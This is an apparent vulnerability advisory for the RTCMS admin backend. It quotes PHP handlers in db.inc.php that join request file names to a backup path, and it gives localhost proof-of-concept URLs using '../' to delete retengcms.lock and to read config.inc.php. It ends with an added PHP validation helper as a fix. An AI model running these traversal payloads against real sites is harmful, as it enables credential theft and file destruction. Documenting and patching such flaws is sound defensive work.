RTCMS Admin Backend Arbitrary File Read && Delete

RTCMS

Download: http://down.admin5.com/php/113335.html

1. Vulnerable file: rtcms\admin\db.inc.php

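    case 'delete':
        if(!$name)showmsg('请选择要删除的备份文件!');
        // Each $filename comes from the request's name[] array and is appended
        // to the backup directory without validation, so "../" leaves data/bakup/.
        foreach($name as $filename)
        {
            @unlink(RETENG_ROOT.'data/bakup/'.$filename);
        }
        showmsg('成功删除备份文件!','?file=db&action=import');
        break;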

1.1 Arbitrary file deletion through the delete action of the admin database restore page: http://localhost/admin.php?file=db&action=delete&do_submit=1&name%5B%5D=../retengcms.lock&chkall2=1

    case 'down':
        // $filename comes from the request and is appended to the backup
        // directory without validation, so "../" leaves data/bakup/.
        $filepath=RETENG_ROOT.'data/bakup/'.$filename;
        $filesize=sprintf("%u", filesize($filepath));
        $filetype=get_fileext($filename);
        if(ob_get_length() !== false) @ob_end_clean();
        header('Pragma: public');
        header('Last-Modified: '.gmdate('D, d M Y H:i:s') . ' GMT');
        header('Cache-Control: no-store, no-cache, must-revalidate');
        header('Cache-Control: pre-check=0, post-check=0, max-age=0');
        header('Content-Transfer-Encoding: binary');
        header('Content-Encoding: none');
        header('Content-type: '.$filetype);
        header('Content-Disposition: attachment; filename="'.$filename.'"');
        header('Content-length: '.$filesize);
        // The file at the unvalidated path is streamed back to the client.
        readfile($filepath);
        exit;
        break;

1.2 Arbitrary file read through the download action of the admin database backup page: http://localhost/admin.php?file=db&action=down&filename=../config.inc.php
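
Both cases above append a request-supplied file name to RETENG_ROOT.'data/bakup/' without validation. The following is an added example, not RTCMS code and not part of the original post, showing one way to constrain the name before it reaches unlink() or readfile(). The helper name resolve_backup_file(), the .sql extension allow-list and the temporary directory layout are assumptions made for the demonstration.

```php
<?php
// Added example, not RTCMS code. resolve_backup_file() is a hypothetical helper.

/**
 * Return the real path of $filename inside $backupDir, or null when the name
 * is not a plain backup file name or resolves outside the directory.
 */
function resolve_backup_file(string $backupDir, $filename): ?string
{
    // name[] elements must be non-empty strings (nested arrays are rejected)
    if (!is_string($filename) || $filename === '') {
        return null;
    }
    // Allow-list: no separators, no "..", no NUL; ".sql" is an assumed extension
    if (!preg_match('/\A[A-Za-z0-9_\-]+(\.[A-Za-z0-9_\-]+)*\.sql\z/', $filename)) {
        return null;
    }
    $base = realpath($backupDir);
    $real = realpath($backupDir . DIRECTORY_SEPARATOR . $filename);
    if ($base === false || $real === false || !is_file($real)) {
        return null;
    }
    // Containment check after symlinks have been resolved
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Constructed demo tree standing in for RETENG_ROOT/data/
$root = sys_get_temp_dir() . '/rtcms_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/data/bakup', 0700, true);
$files = ['/data/bakup/db_20240101.sql', '/data/config.inc.php', '/data/retengcms.lock'];
foreach ($files as $f) {
    file_put_contents($root . $f, '-- constructed sample');
}

// First input is a legitimate backup name; the others are the values from the two URLs
$inputs = ['db_20240101.sql', '../retengcms.lock', '../config.inc.php', ['nested']];
foreach ($inputs as $input) {
    $path = resolve_backup_file($root . '/data/bakup', $input);
    printf("%-24s => %s\n", json_encode($input, JSON_UNESCAPED_SLASHES),
        $path === null ? 'rejected' : 'accepted');
}

// Clean up the demo tree
foreach ($files as $f) { unlink($root . $f); }
rmdir($root . '/data/bakup'); rmdir($root . '/data'); rmdir($root);
```

In the delete and down cases the handler would call unlink() or readfile() only on a non-null return value and stop with an error otherwise.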
